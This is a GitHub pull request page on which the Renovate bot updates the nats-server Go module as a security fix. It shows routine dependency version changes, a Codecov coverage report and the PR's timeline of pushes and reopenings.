  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Apr 15, 2025
edited
Loading

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0

@codecov
Copy link
Copy Markdown

codecov Bot commented Apr 15, 2025
edited
Loading

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 54.94%. Comparing base (3cf2082) to head (591de30).

Additional details and impacted files 
@@            Coverage Diff             @@
##             main      #76      +/-   ##
==========================================
+ Coverage   54.81%   54.94%   +0.12%     
==========================================
  Files          25       25              
  Lines        1609     1609              
==========================================
+ Hits          882      884       +2     
+ Misses        630      628       -2     
  Partials       97       97

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Dec 15, 2025
edited
Loading

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 12 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.25.0
github.com/nats-io/nats.go v1.36.0 -> v1.49.0
github.com/klauspost/compress v1.17.9 -> v1.18.4
github.com/minio/highwayhash v1.0.2 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.5.7 -> v2.8.1
github.com/nats-io/nkeys v0.4.7 -> v0.4.15
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.49.0
golang.org/x/net v0.26.0 -> v0.51.0
golang.org/x/sys v0.21.0 -> v0.42.0
golang.org/x/text v0.16.0 -> v0.35.0
golang.org/x/time v0.5.0 -> v0.15.0
golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d -> v0.42.0

@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 69e2624 to 2765e0c Compare February 24, 2026 19:44
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.10.27 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] Feb 24, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 2765e0c to a6bcd4a Compare March 24, 2026 21:40
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] Mar 24, 2026
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch March 27, 2026 02:13
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] - autoclosed test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch 2 times, most recently from a6bcd4a to fe9cdcc Compare March 30, 2026 21:07
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] - autoclosed test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch 2 times, most recently from fe9cdcc to 591de30 Compare April 27, 2026 23:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

dependencies

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants